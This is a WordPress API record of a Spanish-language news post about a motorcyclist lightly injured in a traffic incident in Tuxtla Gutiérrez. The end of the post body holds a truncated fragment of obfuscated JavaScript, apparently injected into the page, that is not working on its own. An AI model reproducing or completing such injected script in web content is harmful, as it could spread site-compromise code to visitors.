{"id":19828,"date":"2025-01-15T03:36:19","date_gmt":"2025-01-15T03:36:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19828"},"modified":"2025-01-15T03:36:19","modified_gmt":"2025-01-15T03:36:19","slug":"motociclista-resulta-herido-por-corte-de-circulacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19828","title":{"rendered":"Motociclista resulta herido por corte de circulaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250114-WA0016-1024x768.jpg\" alt=\"\" class=\"wp-image-19829\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250114-WA0016-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250114-WA0016-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250114-WA0016-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/IMG-20250114-WA0016.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 14 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un accidente de tr\u00e1nsito ocurrido este martes sobre la Calzada al Sumidero, a la altura del retorno de la Colonia Albania Baja, dej\u00f3 como saldo un joven motociclista herido.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una motocicleta circulaba de Norte a Sur y al llegar a este punto una camioneta pick up Ford de color rojo le cerr\u00f3 el paso haciendo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>El joven de 18 a\u00f1os qued\u00f3 tendido sobre el pavimento y fue atendido por param\u00e9dicos de Protecci\u00f3n Civil Municipal pero no result\u00f3 con heridas de gravedad.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 14 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Un accidente de tr\u00e1nsito ocurrido este martes sobre la Calzada al Sumidero, a la altura del retorno de la Colonia Albania Baja, dej\u00f3 como saldo un joven motociclista herido. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una motocicleta &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19829,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19828","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19828"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19828\/revisions"}],"predecessor-version":[{"id":19830,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19828\/revisions\/19830"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19829"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}